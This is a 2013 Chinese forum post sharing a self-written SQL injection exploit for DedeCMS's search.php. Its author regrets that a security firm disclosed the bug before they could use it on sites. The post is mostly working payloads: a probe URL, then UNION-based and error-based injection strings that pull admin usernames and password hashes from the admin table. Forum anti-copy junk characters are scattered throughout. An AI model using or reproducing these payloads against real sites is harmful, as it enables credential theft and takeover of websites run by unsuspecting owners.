转载不加作者名的没JJ
3 R8 H; J- f' Y$ n# y2 c, `% q8 X, r8 H
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。- W2 e" b$ K7 h8 y N
) B+ H6 ?, z) {0 j9 J6 Z既然已经发出来了,我就把我自己搞的exp发下吧。。唉。7 j. ~, H8 x7 l1 F7 ?
- f8 W5 ^' O/ u+ I" O2 a9 \( |我一般是这样测试的:
# {; u% k3 O. V/ H& R m' H- @1 J% h8 A
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
. d) k# }4 N6 i+ p! h, X
' `6 }2 y X+ o I$ f6 ^转载不加作者名的没JJ
+ P1 h3 v2 Y8 q) a# W- e0 x2 D) Y8 @# F7 @+ s, M$ |' t8 Z
作者:鬼哥
3 }. `2 M4 }5 l6 J- @
% p. u- u% p# ? a! P! L, ~2 m$ y 2 \" {( B1 r# \- p2 c, Q [
, Q0 p. R A" W
看结果如果提示0 ]. J: g7 F. J, L) l
6 ~1 B; G1 q! g: Z! I+ TSafe Alert: Request Error step 2 ! k" W; P+ D. B. W9 U6 B
9 Q7 p+ J; j& v( L: M0 E s
那么直接用下面的exp g7 _: v4 o# ~& P3 e4 @! Q- e
8 G0 E+ {4 h0 J4 D5 Y" A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
) S+ W7 W5 D7 g' _$ h O9 `
# B" K9 h1 E5 g* q2 X/ G* x9 ^- f }8 S$ s3 w1 a5 P
看结果如果提示7 N' q9 @% B2 K* y, e
+ ]( x! k! ~ @2 E6 _Safe Alert: Request Error step 1 !
C1 N* Y- H. ]& i' i. c
9 K; g8 C( a5 S: f, C8 e那么直接用下面的exp
8 |3 M* b; M" d2 a
8 d } M1 u8 r/ I1 w8 Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
+ w1 e, L8 ~# W8 ~
. d) X; Y; ^ c1 F" ~* S' M c. A$ t! _" Q3 T
如果正常显示证明漏洞不存在了。
8 I8 { l9 `7 D
" t3 w8 p; z& H/ T7 p& Q5 R8 r- e# e转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对